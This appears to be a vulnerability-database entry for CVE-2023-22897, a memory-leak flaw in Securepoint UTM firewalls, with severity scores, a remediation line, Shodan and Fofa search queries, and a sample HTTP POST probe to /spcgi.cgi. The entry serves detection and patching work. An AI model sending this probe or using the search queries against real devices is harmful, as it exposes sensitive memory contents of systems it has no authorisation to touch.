| Title | Securepoint UTM - Leaking Remote Memory Contents |
|---|---|
| Author | DhiyaneshDK |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory. |
| Remediation | Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue. |
| CVSS Score | 6.5 |
| EPSS Score | 0.88764 |
| CVE ID | CVE-2023-22897 |
| CWE ID | CWE-908 |
| Shodan Query | title:"Securepoint UTM"http.title:"securepoint utm" |
| Fofa Query | title="securepoint utm" |
| Tags | cve cve2023 securepoint utm exposure memory vkev vuln |
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall’s endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
POST /spcgi.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.5
Connection: close
Content-Length: 2
Content-Type: application/json
Accept-Encoding: gzip
{}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-22897.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-22897.pcap
N/AN/A